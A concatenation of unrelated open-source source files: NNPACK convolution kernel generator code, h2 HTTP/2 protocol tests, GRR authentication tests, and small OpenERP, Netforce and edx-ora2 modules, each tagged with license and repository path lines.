arg_output = Argument(ptr(float_), "output")
with Function("nnp_conv1x1_only_{mr}x{nr}__fma3".format(mr=mr, nr=nr),
(arg_input_channels, arg_image_size, arg_input, arg_kernel, arg_output),
target=uarch.default + isa.fma3):
reg_input_channels = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_input_channels, arg_input_channels)
SHL(reg_input_channels, 2)
reg_image_size = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_image_size, arg_image_size)
SHL(reg_image_size, 2)
reg_inputs = [GeneralPurposeRegister64() for m in range(mr)]
LOAD.ARGUMENT(reg_inputs[0], arg_input)
for m in range(1, mr):
LEA(reg_inputs[m], [reg_inputs[m - 1] + reg_image_size * 1])
reg_kernel = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_kernel, arg_kernel)
reg_outputs = [GeneralPurposeRegister64() for n in range(nr)]
LOAD.ARGUMENT(reg_outputs[0], arg_output)
for n in range(1, nr):
LEA(reg_outputs[n], [reg_outputs[n - 1] + reg_image_size * 1])
ymm_kernel = [[YMMRegister() for n in range(nr)] for m in range(mr)]
for n in range(nr):
for m in range(mr):
VBROADCASTSS(ymm_kernel[m][n], [reg_kernel + m * float_.size])
if n + 1 != nr:
ADD(reg_kernel, reg_input_channels)
main_loop = Loop()
final_block = Block()
SUB(reg_image_size, YMMRegister.size)
JB(main_loop.end)
with main_loop:
# Load vectors from different channels of the output image
ymm_outputs = [YMMRegister() for n in range(nr)]
for reg_output, ymm_output in zip(reg_outputs, ymm_outputs):
VMOVUPS(ymm_output, [reg_output])
for m, reg_input in enumerate(reg_inputs):
# Load vector for a channel of the input image
ymm_input = YMMRegister()
VMOVUPS(ymm_input, [reg_input])
ADD(reg_input, YMMRegister.size)
# Update all outputs using the input and corresponding kernel elements
for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
VFMADD231PS(ymm_output, ymm_kernel[m][n], ymm_input)
if reg_input is reg_inputs[-1]:
VMOVUPS([reg_output], ymm_output)
ADD(reg_output, YMMRegister.size)
SUB(reg_image_size, YMMRegister.size)
JAE(main_loop.begin)
ADD(reg_image_size, YMMRegister.size)
JZ(final_block.end)
with final_block:
reg_mask, ymm_mask = GeneralPurposeRegister64(), YMMRegister()
LEA(reg_mask, Constant.uint32x16(*([0xFFFFFFFF] * 8 + [0x00000000] * 8)))
SUB(reg_mask, reg_image_size)
VMOVDQU(ymm_mask, [reg_mask + YMMRegister.size])
# Load vectors from different channels of the output image
ymm_outputs = [YMMRegister() for n in range(nr)]
for reg_output, ymm_output in zip(reg_outputs, ymm_outputs):
VMASKMOVPS(ymm_output, ymm_mask, [reg_output])
for m, reg_input in enumerate(reg_inputs):
# Load vector for a channel of the input image
ymm_input = YMMRegister()
VMASKMOVPS(ymm_input, ymm_mask, [reg_input])
# Update all outputs using the input and corresponding kernel elements
for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
VFMADD231PS(ymm_output, ymm_kernel[m][n], ymm_input)
if reg_input is reg_inputs[-1]:
VMASKMOVPS([reg_output], ymm_mask, ymm_output)
RETURN()
arg_mr = Argument(uint32_t, "mr")
arg_nr = Argument(uint32_t, "nr")
arg_input_channels = Argument(size_t, "input_channels")
arg_image_size = Argument(size_t, "image_size")
arg_input = Argument(ptr(const_float_), "input")
arg_kernel = Argument(ptr(const_float_), "kernel")
arg_output = Argument(ptr(float_), "output")
with Function("nnp_conv1x1_upto_{mr}x{nr}__fma3".format(mr=mr, nr=nr),
(arg_mr, arg_nr, arg_input_channels, arg_image_size, arg_input, arg_kernel, arg_output),
target=uarch.default + isa.fma3):
reg_mr = GeneralPurposeRegister32()
LOAD.ARGUMENT(reg_mr, arg_mr)
reg_nr = GeneralPurposeRegister32()
LOAD.ARGUMENT(reg_nr, arg_nr)
reg_input_channels = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_input_channels, arg_input_channels)
SHL(reg_input_channels, 2)
reg_image_size = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_image_size, arg_image_size)
SHL(reg_image_size, 2)
reg_inputs = [GeneralPurposeRegister64() for m in range(mr)]
LOAD.ARGUMENT(reg_inputs[0], arg_input)
for m in range(1, mr):
LEA(reg_inputs[m], [reg_inputs[m - 1] + reg_image_size * 1])
reg_kernel = GeneralPurposeRegister64()
LOAD.ARGUMENT(reg_kernel, arg_kernel)
reg_outputs = [GeneralPurposeRegister64() for n in range(nr)]
LOAD.ARGUMENT(reg_outputs[0], arg_output)
for n in range(1, nr):
LEA(reg_outputs[n], [reg_outputs[n - 1] + reg_image_size * 1])
VZEROALL()
ymm_inputs = [YMMRegister() for m in range(mr)]
ymm_kernel = [[YMMRegister() for n in range(nr)] for m in range(mr)]
with Block() as load_kernels:
for n in range(nr):
with Block() as load_kernels_row:
for m in range(mr):
VBROADCASTSS(ymm_kernel[m][n], [reg_kernel + m * float_.size])
if m + 1 != mr:
CMP(reg_mr, m + 1)
JE(load_kernels_row.end)
if n + 1 != nr:
CMP(reg_nr, n + 1)
JE(load_kernels.end)
ADD(reg_kernel, reg_input_channels)
main_loop = Loop()
final_block = Block()
SUB(reg_image_size, YMMRegister.size)
JB(main_loop.end)
with main_loop:
# Load vectors from different channels of the output image
ymm_outputs = [YMMRegister() for n in range(nr)]
with Block() as load_outputs:
for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
VMOVUPS(ymm_output, [reg_output])
if n + 1 != nr:
CMP(reg_nr, n + 1)
JE(load_outputs.end)
with Block() as load_inputs:
for m, (ymm_input, reg_input) in enumerate(zip(ymm_inputs, reg_inputs)):
# Load vector for a channel of the input image
VMOVUPS(ymm_input, [reg_input])
ADD(reg_input, YMMRegister.size)
# Update all outputs using the input and corresponding kernel elements
for n, ymm_output in enumerate(ymm_outputs):
VFMADD231PS(ymm_output, ymm_kernel[m][n], ymm_input)
if m + 1 != mr:
CMP(reg_mr, m + 1)
JE(load_inputs.end)
# Store vectors to different channels of the output image
with Block() as store_outputs:
for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
VMOVUPS([reg_output], ymm_output)
ADD(reg_output, YMMRegister.size)
if n + 1 != nr:
CMP(reg_nr, n + 1)
JE(store_outputs.end)
SUB(reg_image_size, YMMRegister.size)
JAE(main_loop.begin)
ADD(reg_image_size, YMMRegister.size)
JZ(final_block.end)
with final_block:
reg_mask, ymm_mask = GeneralPurposeRegister64(), YMMRegister()
LEA(reg_mask, Constant.uint32x16(*([0xFFFFFFFF] * 8 + [0x00000000] * 8)))
SUB(reg_mask, reg_image_size)
VMOVDQU(ymm_mask, [reg_mask + YMMRegister.size])
# Load vectors from different channels of the output image
ymm_outputs = [YMMRegister() for n in range(nr)]
with Block() as load_outputs:
for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
VMASKMOVPS(ymm_output, ymm_mask, [reg_output])
if n + 1 != nr:
CMP(reg_nr, n + 1)
JE(load_outputs.end)
with Block() as load_inputs:
for m, (ymm_input, reg_input) in enumerate(zip(ymm_inputs, reg_inputs)):
# Load vector for a channel of the input image
VMASKMOVPS(ymm_inputs[m], ymm_mask, [reg_input])
# Update all outputs using the input and corresponding kernel elements
for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
VFMADD231PS(ymm_output, ymm_kernel[m][n], ymm_inputs[m])
if m + 1 != mr:
CMP(reg_mr, m + 1)
JE(load_inputs.end)
# Store vectors to different channels of the output image
with Block() as store_outputs:
for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
VMASKMOVPS([reg_output], ymm_mask, ymm_output)
if n + 1 != nr:
CMP(reg_nr, n + 1)
JE(store_outputs.end)
RETURN()
| bsd-2-clause |
Acidburn0zzz/servo | tests/wpt/web-platform-tests/tools/third_party/h2/test/test_complex_logic.py | 39 | 21420 | # -*- coding: utf-8 -*-
"""
test_complex_logic
~~~~~~~~~~~~~~~~
More complex tests that try to do more.
Certain tests don't really eliminate incorrect behaviour unless they do quite
a bit. These tests should live here, to keep the pain in once place rather than
hide it in the other parts of the test suite.
"""
import pytest
import h2
import h2.config
import h2.connection
class TestComplexClient(object):
"""
Complex tests for client-side stacks.
"""
example_request_headers = [
(':authority', 'example.com'),
(':path', '/'),
(':scheme', 'https'),
(':method', 'GET'),
]
example_response_headers = [
(':status', '200'),
('server', 'fake-serv/0.1.0')
]
def test_correctly_count_server_streams(self, frame_factory):
"""
We correctly count the number of server streams, both inbound and
outbound.
"""
# This test makes no sense unless you do both inbound and outbound,
# because it's important to confirm that we count them correctly.
c = h2.connection.H2Connection()
c.initiate_connection()
expected_inbound_streams = expected_outbound_streams = 0
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
for stream_id in range(1, 15, 2):
# Open an outbound stream
c.send_headers(stream_id, self.example_request_headers)
expected_outbound_streams += 1
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
# Receive a pushed stream (to create an inbound one). This doesn't
# open until we also receive headers.
f = frame_factory.build_push_promise_frame(
stream_id=stream_id,
promised_stream_id=stream_id+1,
headers=self.example_request_headers,
)
c.receive_data(f.serialize())
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
f = frame_factory.build_headers_frame(
stream_id=stream_id+1,
headers=self.example_response_headers,
)
c.receive_data(f.serialize())
expected_inbound_streams += 1
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
for stream_id in range(13, 0, -2):
# Close an outbound stream.
c.end_stream(stream_id)
# Stream doesn't close until both sides close it.
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
f = frame_factory.build_headers_frame(
stream_id=stream_id,
headers=self.example_response_headers,
flags=['END_STREAM'],
)
c.receive_data(f.serialize())
expected_outbound_streams -= 1
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
# Pushed streams can only be closed remotely.
f = frame_factory.build_data_frame(
stream_id=stream_id+1,
data=b'the content',
flags=['END_STREAM'],
)
c.receive_data(f.serialize())
expected_inbound_streams -= 1
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
assert c.open_inbound_streams == 0
assert c.open_outbound_streams == 0
class TestComplexServer(object):
"""
Complex tests for server-side stacks.
"""
example_request_headers = [
(b':authority', b'example.com'),
(b':path', b'/'),
(b':scheme', b'https'),
(b':method', b'GET'),
]
example_response_headers = [
(b':status', b'200'),
(b'server', b'fake-serv/0.1.0')
]
server_config = h2.config.H2Configuration(client_side=False)
def test_correctly_count_server_streams(self, frame_factory):
"""
We correctly count the number of server streams, both inbound and
outbound.
"""
# This test makes no sense unless you do both inbound and outbound,
# because it's important to confirm that we count them correctly.
c = h2.connection.H2Connection(config=self.server_config)
c.receive_data(frame_factory.preamble())
expected_inbound_streams = expected_outbound_streams = 0
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
for stream_id in range(1, 15, 2):
# Receive an inbound stream.
f = frame_factory.build_headers_frame(
headers=self.example_request_headers,
stream_id=stream_id,
)
c.receive_data(f.serialize())
expected_inbound_streams += 1
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
# Push a stream (to create a outbound one). This doesn't open
# until we send our response headers.
c.push_stream(stream_id, stream_id+1, self.example_request_headers)
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
c.send_headers(stream_id+1, self.example_response_headers)
expected_outbound_streams += 1
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
for stream_id in range(13, 0, -2):
# Close an inbound stream.
f = frame_factory.build_data_frame(
data=b'',
flags=['END_STREAM'],
stream_id=stream_id,
)
c.receive_data(f.serialize())
# Stream doesn't close until both sides close it.
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
c.send_data(stream_id, b'', end_stream=True)
expected_inbound_streams -= 1
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
# Pushed streams, however, we can close ourselves.
c.send_data(
stream_id=stream_id+1,
data=b'',
end_stream=True,
)
expected_outbound_streams -= 1
assert c.open_inbound_streams == expected_inbound_streams
assert c.open_outbound_streams == expected_outbound_streams
assert c.open_inbound_streams == 0
assert c.open_outbound_streams == 0
class TestContinuationFrames(object):
"""
Tests for the relatively complex CONTINUATION frame logic.
"""
example_request_headers = [
(b':authority', b'example.com'),
(b':path', b'/'),
(b':scheme', b'https'),
(b':method', b'GET'),
]
server_config = h2.config.H2Configuration(client_side=False)
def _build_continuation_sequence(self, headers, block_size, frame_factory):
f = frame_factory.build_headers_frame(headers)
header_data = f.data
chunks = [
header_data[x:x+block_size]
for x in range(0, len(header_data), block_size)
]
f.data = chunks.pop(0)
frames = [
frame_factory.build_continuation_frame(c) for c in chunks
]
f.flags = {'END_STREAM'}
frames[-1].flags.add('END_HEADERS')
frames.insert(0, f)
return frames
def test_continuation_frame_basic(self, frame_factory):
"""
Test that we correctly decode a header block split across continuation
frames.
"""
c = h2.connection.H2Connection(config=self.server_config)
c.initiate_connection()
c.receive_data(frame_factory.preamble())
frames = self._build_continuation_sequence(
headers=self.example_request_headers,
block_size=5,
frame_factory=frame_factory,
)
data = b''.join(f.serialize() for f in frames)
events = c.receive_data(data)
assert len(events) == 2
first_event, second_event = events
assert isinstance(first_event, h2.events.RequestReceived)
assert first_event.headers == self.example_request_headers
assert first_event.stream_id == 1
assert isinstance(second_event, h2.events.StreamEnded)
assert second_event.stream_id == 1
@pytest.mark.parametrize('stream_id', [3, 1])
def test_continuation_cannot_interleave_headers(self,
frame_factory,
stream_id):
"""
We cannot interleave a new headers block with a CONTINUATION sequence.
"""
c = h2.connection.H2Connection(config=self.server_config)
c.initiate_connection()
c.receive_data(frame_factory.preamble())
c.clear_outbound_data_buffer()
frames = self._build_continuation_sequence(
headers=self.example_request_headers,
block_size=5,
frame_factory=frame_factory,
)
assert len(frames) > 2 # This is mostly defensive.
bogus_frame = frame_factory.build_headers_frame(
headers=self.example_request_headers,
stream_id=stream_id,
flags=['END_STREAM'],
)
frames.insert(len(frames) - 2, bogus_frame)
data = b''.join(f.serialize() for f in frames)
with pytest.raises(h2.exceptions.ProtocolError) as e:
c.receive_data(data)
assert "invalid frame" in str(e.value).lower()
def test_continuation_cannot_interleave_data(self, frame_factory):
"""
We cannot interleave a data frame with a CONTINUATION sequence.
"""
c = h2.connection.H2Connection(config=self.server_config)
c.initiate_connection()
c.receive_data(frame_factory.preamble())
c.clear_outbound_data_buffer()
frames = self._build_continuation_sequence(
headers=self.example_request_headers,
block_size=5,
frame_factory=frame_factory,
)
assert len(frames) > 2 # This is mostly defensive.
bogus_frame = frame_factory.build_data_frame(
data=b'hello',
stream_id=1,
)
frames.insert(len(frames) - 2, bogus_frame)
data = b''.join(f.serialize() for f in frames)
with pytest.raises(h2.exceptions.ProtocolError) as e:
c.receive_data(data)
assert "invalid frame" in str(e.value).lower()
def test_continuation_cannot_interleave_unknown_frame(self, frame_factory):
"""
We cannot interleave an unknown frame with a CONTINUATION sequence.
"""
c = h2.connection.H2Connection(config=self.server_config)
c.initiate_connection()
c.receive_data(frame_factory.preamble())
c.clear_outbound_data_buffer()
frames = self._build_continuation_sequence(
headers=self.example_request_headers,
block_size=5,
frame_factory=frame_factory,
)
assert len(frames) > 2 # This is mostly defensive.
bogus_frame = frame_factory.build_data_frame(
data=b'hello',
stream_id=1,
)
bogus_frame.type = 88
frames.insert(len(frames) - 2, bogus_frame)
data = b''.join(f.serialize() for f in frames)
with pytest.raises(h2.exceptions.ProtocolError) as e:
c.receive_data(data)
assert "invalid frame" in str(e.value).lower()
def test_continuation_frame_multiple_blocks(self, frame_factory):
"""
Test that we correctly decode several header blocks split across
continuation frames.
"""
c = h2.connection.H2Connection(config=self.server_config)
c.initiate_connection()
c.receive_data(frame_factory.preamble())
for stream_id in range(1, 7, 2):
frames = self._build_continuation_sequence(
headers=self.example_request_headers,
block_size=2,
frame_factory=frame_factory,
)
for frame in frames:
frame.stream_id = stream_id
data = b''.join(f.serialize() for f in frames)
events = c.receive_data(data)
assert len(events) == 2
first_event, second_event = events
assert isinstance(first_event, h2.events.RequestReceived)
assert first_event.headers == self.example_request_headers
assert first_event.stream_id == stream_id
assert isinstance(second_event, h2.events.StreamEnded)
assert second_event.stream_id == stream_id
class TestContinuationFramesPushPromise(object):
"""
Tests for the relatively complex CONTINUATION frame logic working with
PUSH_PROMISE frames.
"""
example_request_headers = [
(b':authority', b'example.com'),
(b':path', b'/'),
(b':scheme', b'https'),
(b':method', b'GET'),
]
example_response_headers = [
(b':status', b'200'),
(b'server', b'fake-serv/0.1.0')
]
def _build_continuation_sequence(self, headers, block_size, frame_factory):
f = frame_factory.build_push_promise_frame(
stream_id=1, promised_stream_id=2, headers=headers
)
header_data = f.data
chunks = [
header_data[x:x+block_size]
for x in range(0, len(header_data), block_size)
]
f.data = chunks.pop(0)
frames = [
frame_factory.build_continuation_frame(c) for c in chunks
]
f.flags = {'END_STREAM'}
frames[-1].flags.add('END_HEADERS')
frames.insert(0, f)
return frames
def test_continuation_frame_basic_push_promise(self, frame_factory):
"""
Test that we correctly decode a header block split across continuation
frames when that header block is initiated with a PUSH_PROMISE.
"""
c = h2.connection.H2Connection()
c.initiate_connection()
c.send_headers(stream_id=1, headers=self.example_request_headers)
frames = self._build_continuation_sequence(
headers=self.example_request_headers,
block_size=5,
frame_factory=frame_factory,
)
data = b''.join(f.serialize() for f in frames)
events = c.receive_data(data)
assert len(events) == 1
event = events[0]
assert isinstance(event, h2.events.PushedStreamReceived)
assert event.headers == self.example_request_headers
assert event.parent_stream_id == 1
assert event.pushed_stream_id == 2
@pytest.mark.parametrize('stream_id', [3, 1, 2])
def test_continuation_cannot_interleave_headers_pp(self,
frame_factory,
stream_id):
"""
We cannot interleave a new headers block with a CONTINUATION sequence
when the headers block is based on a PUSH_PROMISE frame.
"""
c = h2.connection.H2Connection()
c.initiate_connection()
c.send_headers(stream_id=1, headers=self.example_request_headers)
frames = self._build_continuation_sequence(
headers=self.example_request_headers,
block_size=5,
frame_factory=frame_factory,
)
assert len(frames) > 2 # This is mostly defensive.
bogus_frame = frame_factory.build_headers_frame(
headers=self.example_response_headers,
stream_id=stream_id,
flags=['END_STREAM'],
)
frames.insert(len(frames) - 2, bogus_frame)
data = b''.join(f.serialize() for f in frames)
with pytest.raises(h2.exceptions.ProtocolError) as e:
c.receive_data(data)
assert "invalid frame" in str(e.value).lower()
def test_continuation_cannot_interleave_data(self, frame_factory):
"""
We cannot interleave a data frame with a CONTINUATION sequence when
that sequence began with a PUSH_PROMISE frame.
"""
c = h2.connection.H2Connection()
c.initiate_connection()
c.send_headers(stream_id=1, headers=self.example_request_headers)
frames = self._build_continuation_sequence(
headers=self.example_request_headers,
block_size=5,
frame_factory=frame_factory,
)
assert len(frames) > 2 # This is mostly defensive.
bogus_frame = frame_factory.build_data_frame(
data=b'hello',
stream_id=1,
)
frames.insert(len(frames) - 2, bogus_frame)
data = b''.join(f.serialize() for f in frames)
with pytest.raises(h2.exceptions.ProtocolError) as e:
c.receive_data(data)
assert "invalid frame" in str(e.value).lower()
def test_continuation_cannot_interleave_unknown_frame(self, frame_factory):
"""
We cannot interleave an unknown frame with a CONTINUATION sequence when
that sequence began with a PUSH_PROMISE frame.
"""
c = h2.connection.H2Connection()
c.initiate_connection()
c.send_headers(stream_id=1, headers=self.example_request_headers)
frames = self._build_continuation_sequence(
headers=self.example_request_headers,
block_size=5,
frame_factory=frame_factory,
)
assert len(frames) > 2 # This is mostly defensive.
bogus_frame = frame_factory.build_data_frame(
data=b'hello',
stream_id=1,
)
bogus_frame.type = 88
frames.insert(len(frames) - 2, bogus_frame)
data = b''.join(f.serialize() for f in frames)
with pytest.raises(h2.exceptions.ProtocolError) as e:
c.receive_data(data)
assert "invalid frame" in str(e.value).lower()
@pytest.mark.parametrize('evict', [True, False])
def test_stream_remotely_closed_disallows_push_promise(self,
evict,
frame_factory):
"""
Streams closed normally by the remote peer disallow PUSH_PROMISE
frames, and cause a GOAWAY.
"""
c = h2.connection.H2Connection()
c.initiate_connection()
c.send_headers(
stream_id=1,
headers=self.example_request_headers,
end_stream=True
)
f = frame_factory.build_headers_frame(
stream_id=1,
headers=self.example_response_headers,
flags=['END_STREAM']
)
c.receive_data(f.serialize())
c.clear_outbound_data_buffer()
if evict:
# This is annoyingly stateful, but enumerating the list of open
# streams will force us to flush state.
assert not c.open_outbound_streams
f = frame_factory.build_push_promise_frame(
stream_id=1,
promised_stream_id=2,
headers=self.example_request_headers,
)
with pytest.raises(h2.exceptions.ProtocolError):
c.receive_data(f.serialize())
f = frame_factory.build_goaway_frame(
last_stream_id=0,
error_code=h2.errors.ErrorCodes.PROTOCOL_ERROR,
)
assert c.data_to_send() == f.serialize()
def test_continuation_frame_multiple_push_promise(self, frame_factory):
"""
Test that we correctly decode header blocks split across continuation
frames when those header block is initiated with a PUSH_PROMISE, for
more than one pushed stream.
"""
c = h2.connection.H2Connection()
c.initiate_connection()
c.send_headers(stream_id=1, headers=self.example_request_headers)
for promised_stream_id in range(2, 8, 2):
frames = self._build_continuation_sequence(
headers=self.example_request_headers,
block_size=2,
frame_factory=frame_factory,
)
frames[0].promised_stream_id = promised_stream_id
data = b''.join(f.serialize() for f in frames)
events = c.receive_data(data)
assert len(events) == 1
event = events[0]
assert isinstance(event, h2.events.PushedStreamReceived)
assert event.headers == self.example_request_headers
assert event.parent_stream_id == 1
assert event.pushed_stream_id == promised_stream_id
| mpl-2.0 |
cfg2015/EPT-2015-2 | addons/project_issue/report/__init__.py | 442 | 1084 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import project_issue_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
ojengwa/grr | server/data_server/auth_test.py | 5 | 4768 | #!/usr/bin/env python
"""Test the authentication facilities of the data servers."""
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import test_lib
from grr.lib import utils
from grr.server.data_server import auth
class AuthTest(test_lib.GRRBaseTest):
"""Tests the authentication package of the data server."""
def setUp(self):
super(AuthTest, self).setUp()
config_lib.CONFIG.Set("Dataserver.server_username", "rootuser1")
config_lib.CONFIG.Set("Dataserver.server_password", "somelongpasswordaabb")
config_lib.CONFIG.Set("Dataserver.client_credentials",
["rootuser1:somelongpasswordaabb:rw"])
def testNonceStoreSimple(self):
# Test creation and deletion of nonces.
store = auth.NonceStore()
nonce1 = store.NewNonce()
self.assertNotEqual(nonce1, None)
self.assertEqual(nonce1, store.GetNonce(nonce1))
self.assertEqual(None, store.GetNonce(nonce1))
# Check if new nonce is not equal to the previous one.
nonce2 = store.NewNonce()
self.assertNotEqual(nonce2, None)
self.assertNotEqual(nonce1, nonce2)
self.assertEqual(nonce2, store.GetNonce(nonce2))
self.assertEqual(None, store.GetNonce(nonce2))
def testNonceStoreInvalidateOldNonces(self):
with utils.MultiStubber((auth.NonceStore, "NONCE_LEASE", 1),
(auth.NonceStore, "MAX_NONCES", 5)):
store = auth.NonceStore()
now = 1000000
with test_lib.FakeTime(now):
# Add a few nonces first.
nonces = []
for _ in xrange(0, 5):
nonces.append(store.NewNonce())
with test_lib.FakeTime(now + 2):
# Two seconds have passed, therefore old nonces will disappear.
nonce = store.NewNonce()
self.assertEqual(nonce, store.GetNonce(nonce))
for nonce in nonces:
self.assertEqual(store.GetNonce(nonce), None)
def testNonceStoreTooMany(self):
with utils.Stubber(auth.NonceStore, "MAX_NONCES", 5):
# Attempt to get a lot of nonces at once.
store = auth.NonceStore()
old_nonce = None
for _ in xrange(0, auth.NonceStore.MAX_NONCES):
old_nonce = store.NewNonce()
self.assertNotEqual(old_nonce, None)
# We cannot get any nonce now!
nonce1 = store.NewNonce()
self.assertEqual(nonce1, None)
# If we remove one nonce, then we should be able to get a new one.
self.assertEqual(old_nonce, store.GetNonce(old_nonce))
nonce1 = store.NewNonce()
self.assertEqual(nonce1, store.GetNonce(nonce1))
def testServerCredentials(self):
user = config_lib.CONFIG["Dataserver.server_username"]
pwd = config_lib.CONFIG["Dataserver.server_password"]
# Use correct credentials.
store = auth.NonceStore()
nonce = store.NewNonce()
token = auth.NonceStore.GenerateAuthToken(nonce, user, pwd)
# Credentials must validate.
self.assertTrue(store.ValidateAuthTokenServer(token))
self.assertEqual(store.GetNonce(nonce), None)
# Use bad password.
nonce = store.NewNonce()
token = auth.NonceStore.GenerateAuthToken(nonce, user, "badpassword")
# Credentials must fail.
self.assertFalse(store.ValidateAuthTokenServer(token))
self.assertEqual(store.GetNonce(nonce), None)
# Use bad nonce.
token = auth.NonceStore.GenerateAuthToken("x" * auth.NONCE_SIZE, user, pwd)
self.assertFalse(store.ValidateAuthTokenServer(token))
def testClientCredentials(self):
user = config_lib.CONFIG["Dataserver.server_username"]
pwd = config_lib.CONFIG["Dataserver.server_password"]
# Check credentials.
creds = auth.ClientCredentials()
creds.InitializeFromConfig()
self.assertTrue(creds.HasUser(user))
self.assertEqual(creds.GetPassword(user), "somelongpasswordaabb")
self.assertEqual(creds.GetPermissions(user), "rw")
self.assertFalse(creds.HasUser("user2"))
self.assertEqual(creds.GetPassword("user2"), None)
# Encrypt credentials.
cipher = creds.Encrypt(user, pwd)
self.assertNotEqual(cipher, "")
creds2 = auth.ClientCredentials()
self.assertEqual(creds2.InitializeFromEncryption(cipher, user, pwd),
creds2)
# Must have same credentials.
self.assertTrue(creds2.HasUser(user))
self.assertEqual(creds2.GetPassword(user), "somelongpasswordaabb")
self.assertEqual(creds2.GetPermissions(user), "rw")
# Create new credentials with wrong password.
creds3 = auth.ClientCredentials()
self.assertEqual(creds3.InitializeFromEncryption(cipher, user,
"badpassword"), None)
self.assertFalse(creds3.HasUser(user))
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
| apache-2.0 |
sidzan/netforce | netforce_product/netforce_product/models/product_attribute_value.py | 4 | 1579 | # Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce.model import Model, fields
class AttributeValue(Model):
_name = "product.attribute.value"
_fields = {
"product_id": fields.Many2One("product", "Product", required=True, on_delete="cascade"),
"attribute_id": fields.Many2One("product.attribute", "Attribute", required=True),
"value": fields.Char("Value"), # Deprecated
"option_id": fields.Many2One("product.attribute.option", "Value"),
}
AttributeValue.register()
| mit |
GbalsaC/bitnamiP | edx-ora2/openassessment/assessment/api/self.py | 6 | 12139 | """
Public interface for self-assessment.
"""
import logging
from django.db import DatabaseError, transaction
from dogapi import dog_stats_api
from submissions.api import get_submission_and_student, SubmissionNotFoundError
from openassessment.assessment.serializers import (
InvalidRubric, full_assessment_dict, rubric_from_dict, serialize_assessments
)
from openassessment.assessment.models import (
Assessment, AssessmentPart, InvalidRubricSelection
)
from openassessment.assessment.errors import (
SelfAssessmentRequestError, SelfAssessmentInternalError
)
# Assessments are tagged as "self-evaluation"
SELF_TYPE = "SE"
logger = logging.getLogger("openassessment.assessment.api.self")
def submitter_is_finished(submission_uuid, requirements):
"""
Check whether a self-assessment has been completed for a submission.
Args:
submission_uuid (str): The unique identifier of the submission.
requirements (dict): Any attributes of the assessment module required
to determine if this assessment is complete. There are currently
no requirements for a self-assessment.
Returns:
True if the submitter has assessed their answer
Examples:
>>> submitter_is_finished('222bdf3d-a88e-11e3-859e-040ccee02800', {})
True
"""
return Assessment.objects.filter(
score_type=SELF_TYPE, submission_uuid=submission_uuid
).exists()
def assessment_is_finished(submission_uuid, requirements):
"""
Check whether a self-assessment has been completed. For self-assessment,
this function is synonymous with submitter_is_finished.
Args:
submission_uuid (str): The unique identifier of the submission.
requirements (dict): Any attributes of the assessment module required
to determine if this assessment is complete. There are currently
no requirements for a self-assessment.
Returns:
True if the assessment is complete.
Examples:
>>> assessment_is_finished('222bdf3d-a88e-11e3-859e-040ccee02800', {})
True
"""
return submitter_is_finished(submission_uuid, requirements)
def get_score(submission_uuid, requirements):
"""
